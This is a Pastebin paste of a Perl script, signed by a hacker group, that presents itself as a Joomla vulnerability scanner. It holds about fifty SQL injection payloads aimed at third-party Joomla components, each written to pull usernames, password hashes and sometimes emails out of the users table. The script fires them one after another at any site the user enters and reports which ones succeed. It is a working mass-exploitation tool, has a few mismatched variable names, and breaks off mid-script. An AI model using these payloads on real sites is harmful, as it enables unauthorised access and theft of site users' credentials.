Advertisement
cybercode

CMS Joomla! Vulnerability Scanner

Feb 24th, 2012
1,711
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 26.50 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. ########################################
  4. #[~] Coded by           :  X-h4ck
  5. #[~] Greetz             :  4LiFe - IlyrianWarrior - Wulns~ - st3aler - cRu3l.b0y - Hack-Down - H3LL
  6. #[!] Name               :  Joomla vulnerability scanner
  7. #[!] Email              :  mem001@live.com
  8. #h4ck0ff ~ sacred legion
  9. #Pirate.AL
  10. ########################################
  11.  
  12.  
  13. print q{
  14.  
  15. +---------------------------------------------------------------+
  16. |                   h4ck0ff ~ sacred legion                     |
  17. |/*************************************************************\|
  18. |  [x] Name     : Joomla Vulnerability Scanner                  |
  19. |  [x] Coded by : X-h4ck                                        |
  20. |  [x] E-mail   : mem001[at]live[dot]com                        |
  21. |  [x] Site     : www.Pirate.AL                                 |
  22. |  [x] Greetz   : 4LiFe - IllyrianWarrior - Wulns~ - st3aler    |
  23. |                       cRu3l.b0y - Hack-Down - H3LL            |
  24. +---------------------------------------------------------------+
  25.  
  26.  
  27.  
  28. ########################################
  29. Joomla Vulnerability Scanner
  30. - SQLi scanner *remote v1 (2010 exploits)
  31. ########################################
  32. };
  33.  
  34.  
  35. use HTTP::Request;
  36. use LWP::UserAgent;
  37.  
  38.  
  39. ###xpl###
  40. $com_jeajaxeventcalendar="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
  41. $com_storedirectory="UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users";
  42. $com_annuaire="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
  43. $com_maianmedia="+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--";
  44. $com_alfurqan15x="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
  45. $com_markt="+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--";
  46. $com_sponsorwall="+and+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,6,7,8,9,10+from+jos_users--";
  47. $com_flipwall="+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--";
  48. $jedirectory="+1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),4,5,6,7,8,9,10,11+from+jos_users+where+id=userid--";
  49. $com_ezautos="+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--";
  50. $com_arash="+and 1=0 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users";
  51. $com_taxes="+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--";
  52. $com_vat="+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--";
  53. $com_blogs="/**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--";
  54. $com_gr="+union+select+1,concat(username,0x3a,password)+from+jos_users--";
  55. $com_simpleshop="UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--";
  56. $com_youtube="union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--";
  57. $com_joomdle="-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz";
  58. $com_itaromry="?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+";
  59. $com_iproperty="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
  60. $com_huruhelpdesk="/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--";
  61. $com_jomtube="+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
  62. $com_spa="%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--";
  63. $com_staticxt="+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users";
  64. $com_ybggal="+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--";
  65. $com_quran="/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--";
  66. $com_konsultasi="/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--";
  67. $com_newsfeeds="%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--";
  68. $wapmain="+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--";
  69. $com_abc="+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--";
  70. $com_joomradio="+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--";
  71. $com_jtm="/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search";
  72. $com_gbufacebook="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz";
  73. $com_manager="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
  74. $com_jp_jobs="/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users--";
  75. $com_sermonspeaker="/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/";
  76. $com_jdrugstopic="+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--";
  77. $com_mv_restaurantmenumanager="+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users";
  78. $com_articles="+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—-";
  79. $com_dcs_flashgames="+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--";
  80. $com_bidding="+UNION ALL SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--";
  81. $com_acteammember="+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en";
  82. $com_acstartseite="+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users〈=de";
  83. $com_productbook="+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--";
  84. $com_yelp="+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,concat_ws(0x3a3a3a,username,password),8,9,10,11,12,13,14,15,16,17+FROM+jos_users--";
  85. $com_dms="+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--";
  86. $com_jbpublishdownfp="+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users";
  87. $com_casino="+union+all+select+1,username,password,4,5+from+jos_users/*";
  88. $com_doqment="/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--";
  89. $com_alfresco="/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--";
  90. $com_countries="/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users";
  91.  
  92.  
  93.  
  94.  
  95. print "\nWeb page: http://wwww.site.com/ : ";
  96. chomp(my $target=<STDIN>);
  97.  
  98. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  99. $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
  100. $host = $target . "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-999 .$com_jeajaxeventcalendar.";
  101. $res = $b->request(HTTP::Request->new(GET=>$host));
  102. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
  103. print "[*] Results : CHECK : \n";
  104. print "Joomla JE Ajax Event Component (com_jeajaxeventcalendar) SQL Injection Vulnerability ! \n\n";
  105. }
  106. else{print "\n[-] Error\n";
  107. }
  108.  
  109. $host = $target . "/index.php?option=com_storedirectory&task=view&id=-999 .$com_storedirectory.";
  110. $res = $b->request(HTTP::Request->new(GET=>$host));
  111. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
  112. print "[*] Results : CHECK : \n";
  113. print "Joomla Component (com_storedirectory) SQL Injection Vulnerability ! \n\n";
  114. }
  115. else{print "\n[-] Error\n";
  116. }
  117.  
  118. $host = $target . "/index.php?option=com_annuaire&view=annuaire&type=cat&id=-999 .$com_annuaire.";
  119. $res = $b->request(HTTP::Request->new(GET=>$host));
  120. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  121. print "[*] Results : CHECK : \n";
  122. print "Joomla (com_annuaire) SQL Injection Vulnerability ! \n\n";
  123. }
  124. else{print "\n[-] Error\n";
  125. }
  126.  
  127. $host = $target . "/index.php?option=com_maianmedia&view=music&cat=-999 .$com_maianmedia.";
  128. $res = $b->request(HTTP::Request->new(GET=>$host));
  129. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  130. print "[*] Results : CHECK : \n";
  131. print "Joomla Component (com_maianmedia) SQL Injection Vulnerability ! \n\n";
  132. }
  133. else{print "\n[-] Error\n";
  134. }
  135.  
  136. $host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999 .$com_alfurqan15x.";
  137. $res = $b->request(HTTP::Request->new(GET=>$host));
  138. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  139. print "[*] Results : CHECK : \n";
  140. print "Joomla Component (com_alfurqan15x) SQL Injection Vulnerability ! \n\n";
  141. }
  142. else{print "\n[-] Error\n";
  143. }
  144.  
  145. $host = $target . "/index.php?option=com_markt&page=show_category&catid=999 .$com_markt.";
  146. $res = $b->request(HTTP::Request->new(GET=>$host));
  147. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  148. print "[*] Results : CHECK : \n";
  149. print "Joomla Component (com_markt) SQL Injection Vulnerability ! \n\n";
  150. }
  151. else{print "\n[-] Error\n";
  152. }
  153.  
  154. $host = $target . "/index.php?option=com_sponsorwall&controller=sponsorwall&catid=9999 .$com_sponsorwall.";
  155. $res = $b->request(HTTP::Request->new(GET=>$host));
  156. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  157. print "[*] Results : CHECK : \n";
  158. print "Joomla Component (com_sponsorwall) SQL Injection Vulnerability ! \n\n";
  159. }
  160. else{print "\n[-] Error\n";
  161. }
  162.  
  163. $host = $target . "/index.php?option=com_flipwall&controller=flipwall&catid=999 .$com_flipwall.";
  164. $res = $b->request(HTTP::Request->new(GET=>$host));
  165. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  166. print "[*] Results : CHECK : \n";
  167. print "Joomla Component (com_flipwall) SQL Injection Vulnerability ! \n\n";
  168. }
  169. else{print "\n[-] Error\n";
  170. }
  171.  
  172. $host = $target . "/index.php?option=com_jedirectory&view=item&catid=999 .$jedirectory.";
  173. $res = $b->request(HTTP::Request->new(GET=>$host));
  174. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  175. print "[*] Results : CHECK : \n";
  176. print "Joomla JE Directory SQL Injection Vulnerability ! \n\n";
  177. }
  178. else{print "\n[-] Error\n";
  179. }
  180.  
  181. $host = $target . "/index.php?option=com_ezautos&Itemid=999&id=1&task=helpers&firstCode=999 .$com_ezautos.";
  182. $res = $b->request(HTTP::Request->new(GET=>$host));
  183. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  184. print "[*] Results : CHECK : \n";
  185. print "Joomla Component (com_ezautos) SQL Injection Vulnerability ! \n\n";
  186. }
  187. else{print "\n[-] Error\n";
  188. }
  189.  
  190. $host = $target . "/index.php?option=com_arash&id=999 .$com_arash.";
  191. $res = $b->request(HTTP::Request->new(GET=>$host));
  192. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  193. print "[*] Results : CHECK : \n";
  194. print "Joomla Component (com_arash) SQL Injection Vulnerability ! \n\n";
  195. }
  196. else{print "\n[-] Error\n";
  197. }
  198.  
  199. $host = $target . "/index.php?option=com_taxes&id=-999 .$com_taxes.";
  200. $res = $b->request(HTTP::Request->new(GET=>$host));
  201. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  202. print "[*] Results : CHECK : \n";
  203. print "Joomla Component (com_taxes) SQL Injection Vulnerability ! \n\n";
  204. }
  205. else{print "\n[-] Error\n";
  206. }
  207.  
  208. $host = $target . "/index.php?option=com_vat&id=-999 .$com_vat.";
  209. $res = $b->request(HTTP::Request->new(GET=>$host));
  210. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  211. print "[*] Results : CHECK : \n";
  212. print "Joomla Component (com_vat) SQL Injection Vulnerability ! \n\n";
  213. }
  214. else{print "\n[-] Error\n";
  215. }
  216.  
  217. $host = $target . "/index.php?option=com_blogs&task=details&b_id=999 .$com_blogs.";
  218. $res = $b->request(HTTP::Request->new(GET=>$host));
  219. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  220. print "[*] Results : CHECK : \n";
  221. print "Joomla Component (com_blogs) SQL Injection Vulnerability ! \n\n";
  222. }
  223. else{print "\n[-] Error\n";
  224. }
  225.  
  226. $host = $target . "/index.php?option=com_blogs&task=details&b_id=-999 .$com_gr.";
  227. $res = $b->request(HTTP::Request->new(GET=>$host));
  228. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  229. print "[*] Results : CHECK : \n";
  230. print "Joomla Component (com_gr) SQL Injection Vulnerability ! \n\n";
  231. }
  232. else{print "\n[-] Error\n";
  233. }
  234.  
  235. $host = $target . "/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=-999 .$com_simpleshop.";
  236. $res = $b->request(HTTP::Request->new(GET=>$host));
  237. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  238. print "[*] Results : CHECK : \n";
  239. print "Joomla Component (com_simpleshop) SQL Injection Vulnerability ! \n\n";
  240. }
  241. else{print "\n[-] Error\n";
  242. }
  243.  
  244. $host = $target . "/index.php?option=com_youtube&id_cate=999 .$com_youtube.";
  245. $res = $b->request(HTTP::Request->new(GET=>$host));
  246. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  247. print "[*] Results : CHECK : \n";
  248. print "Joomla Component (com_youtube) SQL Injection Vulnerability ! \n\n";
  249. }
  250. else{print "\n[-] Error\n";
  251. }
  252.  
  253. $host = $target . "/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=.$com_joomdle.";
  254. $res = $b->request(HTTP::Request->new(GET=>$host));
  255. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  256. print "[*] Results : CHECK : \n";
  257. print "Joomla Component (com_joomdle) SQL Injection Vulnerability ! \n\n";
  258. }
  259. else{print "\n[-] Error\n";
  260. }
  261.  
  262. $host = $target . "/index.php?option=com_itarmory&view=guildmembers&Itemid=.$com_itarmory.";
  263. $res = $b->request(HTTP::Request->new(GET=>$host));
  264. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  265. print "[*] Results : CHECK : \n";
  266. print "Joomla Component (com_itarmory) SQL Injection Vulnerability ! \n\n";
  267. }
  268. else{print "\n[-] Error\n";
  269. }
  270.  
  271. $host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999 .$com_iproperty.";
  272. $res = $b->request(HTTP::Request->new(GET=>$host));
  273. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  274. print "[*] Results : CHECK : \n";
  275. print "Joomla Component (com_iproperty) SQL Injection Vulnerability ! \n\n";
  276. }
  277. else{print "\n[-] Error\n";
  278. }
  279.  
  280. $host = $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=999 .$com_huruhelpdesk.";
  281. $res = $b->request(HTTP::Request->new(GET=>$host));
  282. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  283. print "[*] Results : CHECK : \n";
  284. print "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability ! \n\n"
  285. }
  286. else{print "\n[-] Error\n";
  287. }
  288.  
  289. $host = $target . "/index.php?view=videos&type=member&user_id=-999 .$com_jomtube.";
  290. $res = $b->request(HTTP::Request->new(GET=>$host));
  291. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  292. print "[*] Results : CHECK : \n";
  293. print "Joomla Component (com_jomtube) SQL Injection Vulnerability ! \n\n"
  294. }
  295. else{print "\n[-] Error\n";
  296. }
  297.  
  298. $host = $target . "/index.php?option=com_spa&view=spa_read_more&pid=-999 .$com_spa.";
  299. $res = $b->request(HTTP::Request->new(GET=>$host));
  300. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  301. print "[*] Results : CHECK : \n";
  302. print "Joomla Component (com_spa) SQL Injection Vulnerability ! \n\n"
  303. }
  304. else{print "\n[-] Error\n";
  305. }
  306.  
  307. $host = $target . "/index.php?option=com_staticxt&staticfile=test.php&id=-999 .$com_staticxt.";
  308. $res = $b->request(HTTP::Request->new(GET=>$host));
  309. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  310. print "[*] Results : CHECK : \n";
  311. print "Joomla Component (com_staticxt) SQL Injection Vulnerability ! \n\n"
  312. }
  313. else{print "\n[-] Error\n";
  314. }
  315.  
  316. $host = $target . "/index.php?option=com_ybggal&Itemid=999&catid=999 .$com_ybggal.";
  317. $res = $b->request(HTTP::Request->new(GET=>$host));
  318. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  319. print "[*] Results : CHECK : \n";
  320. print "Joomla Component (com_ybggal) SQL Injection Vulnerability ! \n\n"
  321. }
  322. else{print "\n[-] Error\n";
  323. }
  324.  
  325. $host = $target . "/index.php?option=com_quran&action=viewayat&surano=999 .$com_quran.";
  326. $res = $b->request(HTTP::Request->new(GET=>$host));
  327. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  328. print "[*] Results : CHECK : \n";
  329. print "Joomla Component (com_quran) SQL Injection Vulnerability ! \n\n"
  330. }
  331. else{print "\n[-] Error\n";
  332. }
  333.  
  334. $host = $target . "/index.php?option=com_konsultasi&act=detail&sid=999 .$com_konsultasi.";
  335. $res = $b->request(HTTP::Request->new(GET=>$host));
  336. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  337. print "[*] Results : CHECK : \n";
  338. print "Joomla Component (com_konsultasi) SQL Injection Vulnerability ! \n\n"
  339. }
  340. else{print "\n[-] Error\n";
  341. }
  342.  
  343. $host = $target . "/index.php?option=com_newsfeeds&view=categories&feedid=-999 .$com_newsfeeds.";
  344. $res = $b->request(HTTP::Request->new(GET=>$host));
  345. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  346. print "[*] Results : CHECK : \n";
  347. print "Joomla Component (com_newsfeeds) SQL Injection Vulnerability ! \n\n"
  348. }
  349. else{print "\n[-] Error\n";
  350. }
  351.  
  352. $host = $target . "/wap/wapmain.php?option=onews&action=link&id=-999 .$wapmain.";
  353. $res = $b->request(HTTP::Request->new(GET=>$host));
  354. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  355. print "[*] Results : CHECK : \n";
  356. print "Joomla Component (wapmain.php) SQL Injection Vulnerability ! \n\n"
  357. }
  358. else{print "\n[-] Error\n";
  359. }
  360.  
  361. $host = $target . "/index.php?option=com_abc&view=abc&letter=AS&sectionid=-999 .$com_abc.";
  362. $res = $b->request(HTTP::Request->new(GET=>$host));
  363. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  364. print "[*] Results : CHECK : \n";
  365. print "Joomla Component (com_abc) SQL Injection Vulnerability ! \n\n"
  366. }
  367. else{print "\n[-] Error\n";
  368. }
  369.  
  370. $host = $target . "/index2.php?option=com_joomradio&page=show_video&id=-999 .$com_joomradio.";
  371. $res = $b->request(HTTP::Request->new(GET=>$host));
  372. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  373. print "[*] Results : CHECK : \n";
  374. print "Joomla Component (com_joomradio) SQL Injection Vulnerability ! \n\n"
  375. }
  376. else{print "\n[-] Error\n";
  377. }
  378.  
  379. $host = $target . "/index.php?option=com_jtm&view=search&view=search&author=-999 .$com_jtm.";
  380. $res = $b->request(HTTP::Request->new(GET=>$host));
  381. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  382. print "[*] Results : CHECK : \n";
  383. print "Joomla Component JTM Reseller SQL Injection Vulnerability ! \n\n"
  384. }
  385. else{print "\n[-] Error\n";
  386. }
  387.  
  388. $host = $target . "/index.php?option=com_gbufacebook&task=show_face&face_id=-999 .$com_gbufacebook.";
  389. $res = $b->request(HTTP::Request->new(GET=>$host));
  390. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  391. print "[*] Results : CHECK : \n";
  392. print "Joomla Component (com_gbufacebook) SQL Injection Vulnerability ! \n\n"
  393. }
  394. else{print "\n[-] Error\n";
  395. }
  396.  
  397. $host = $target . "/index.php?option=com_manager&view=flight&Itemid=999 .$com_manager.";
  398. $res = $b->request(HTTP::Request->new(GET=>$host));
  399. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  400. print "[*] Results : CHECK : \n";
  401. print "Joomla Component (com_manager) SQL Injection Vulnerability ! \n\n"
  402. }
  403. else{print "\n[-] Error\n";
  404. }
  405.  
  406. $host = $target . "/index.php?option=com_jp_jobs&view=detail&id=-999 .$com_jp_jobs.";
  407. $res = $b->request(HTTP::Request->new(GET=>$host));
  408. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  409. print "[*] Results : CHECK : \n";
  410. print "Joomla Component (com_jp_jobs) SQL Injection Vulnerability ! \n\n"
  411. }
  412. else{print "\n[-] Error\n";
  413. }
  414.  
  415. $host = $target . "/index.php?option=com_sermonspeaker&task=latest_sermons&id=-999 .$com_sermonspeaker.";
  416. $res = $b->request(HTTP::Request->new(GET=>$host));
  417. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  418. print "[*] Results : CHECK : \n";
  419. print "Joomla Component (com_sermonspeaker) SQL Injection Vulnerability ! \n\n"
  420. }
  421. else{print "\n[-] Error\n";
  422. }
  423.  
  424. $host = $target . "/index.php?option=com_jdrugstopics&view=drugsdetails&id=-999 .$com_jdrugstopics.";
  425. $res = $b->request(HTTP::Request->new(GET=>$host));
  426. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  427. print "[*] Results : CHECK : \n";
  428. print "Joomla Component (com_jdrugstopics) SQL Injection Vulnerability ! \n\n"
  429. }
  430. else{print "\n[-] Error\n";
  431. }
  432.  
  433. $host = $target . "/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=999 .$com_mv_restaurantmenumanager.";
  434. $res = $b->request(HTTP::Request->new(GET=>$host));
  435. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  436. print "[*] Results : CHECK : \n";
  437. print "Joomla Component (com_mv_restaurantmenumanager) SQL Injection Vulnerability ! \n\n"
  438. }
  439. else{print "\n[-] Error\n";
  440. }
  441.  
  442. $host = $target . "/index.php?option=com_articles&task=view_addarticles&sid=999 .$com_articles.";
  443. $res = $b->request(HTTP::Request->new(GET=>$host));
  444. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  445. print "[*] Results : CHECK : \n";
  446. print "Joomla Component (com_articles) SQL Injection Vulnerability ! \n\n"
  447. }
  448. else{print "\n[-] Error\n";
  449. }
  450.  
  451. $host = $target . "/index.php?option=com_dcs_flashgames&Itemid=61&catid=999 .$com_dcs_flashgames.";
  452. $res = $b->request(HTTP::Request->new(GET=>$host));
  453. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  454. print "[*] Results : CHECK : \n";
  455. print "Joomla Component (com_dcs_flashgames) SQL Injection Vulnerability ! \n\n"
  456. }
  457. else{print "\n[-] Error\n";
  458. }
  459.  
  460. $host = $target . "/index.php?option=com_bidding&id=-999 .$com_bidding.";
  461. $res = $b->request(HTTP::Request->new(GET=>$host));
  462. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  463. print "[*] Results : CHECK : \n";
  464. print "Joomla Component (com_bidding) SQL Injection Vulnerability ! \n\n"
  465. }
  466. else{print "\n[-] Error\n";
  467. }
  468.  
  469. $host = $target . "/index.php?option=com_acteammember&id=-999 .$com_acteammember.";
  470. $res = $b->request(HTTP::Request->new(GET=>$host));
  471. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  472. print "[*] Results : CHECK : \n";
  473. print "Joomla Component (com_acteammember) SQL Injection Vulnerability ! \n\n"
  474. }
  475. else{print "\n[-] Error\n";
  476. }
  477.  
  478. $host = $target . "/index.php?option=com_acstartseite&Itemid=999 .$com_acstartseite.";
  479. $res = $b->request(HTTP::Request->new(GET=>$host));
  480. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  481. print "[*] Results : CHECK : \n";
  482. print "Joomla Component (com_acstartseite) SQL Injection Vulnerability ! \n\n"
  483. }
  484. else{print "\n[-] Error\n";
  485. }
  486.  
  487. $host = $target . "/index.php?option=com_productbook&Itemid=999&func=detail&id=-999 .$com_productbook.";
  488. $res = $b->request(HTTP::Request->new(GET=>$host));
  489. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  490. print "[*] Results : CHECK : \n";
  491. print "Joomla Component (com_productbook) SQL Injection Vulnerability ! \n\n"
  492. }
  493. else{print "\n[-] Error\n";
  494. }
  495.  
  496. $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
  497. $res = $b->request(HTTP::Request->new(GET=>$host));
  498. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  499. print "[*] Results : CHECK : \n";
  500. print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
  501. }
  502. else{print "\n[-] Error\n";
  503. }
  504.  
  505. $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
  506. $res = $b->request(HTTP::Request->new(GET=>$host));
  507. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  508. print "[*] Results : CHECK : \n";
  509. print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
  510. }
  511. else{print "\n[-] Error\n";
  512. }
  513.  
  514. $host = $target . "/index.php?option=com_dms&task=view_category&category_id=-999 .$com_dms.";
  515. $res = $b->request(HTTP::Request->new(GET=>$host));
  516. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  517. print "[*] Results : CHECK : \n";
  518. print "Joomla Component (com_dms) SQL Injection Vulnerability ! \n\n"
  519. }
  520. else{print "\n[-] Error\n";
  521. }
  522.  
  523. $host = $target . "/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-999 .$com_jbpublishdownfp.";
  524. $res = $b->request(HTTP::Request->new(GET=>$host));
  525. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  526. print "[*] Results : CHECK : \n";
  527. print "Joomla Component (com_jbpublishdownfp) SQL Injection Vulnerability ! \n\n"
  528. }
  529. else{print "\n[-] Error\n";
  530. }
  531.  
  532. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  533. $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
  534. $host = $target . "/administrator/index.php?option=com_casino&task=category&id=-999 .$com_casino.";
  535. $res = $b->request(HTTP::Request->new(GET=>$host));
  536. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  537. print "[*] Results : CHECK : \n";
  538. print "Joomla Component (com_casino) SQL Injection Vulnerability ! \n\n"
  539. }
  540. else{print "\n[-] Error\n";
  541. }
  542.  
  543. $host = $target . "/index.php?option=com_doqment&cid=-999 .$com_doqment.";
  544. $res = $b->request(HTTP::Request->new(GET=>$host));
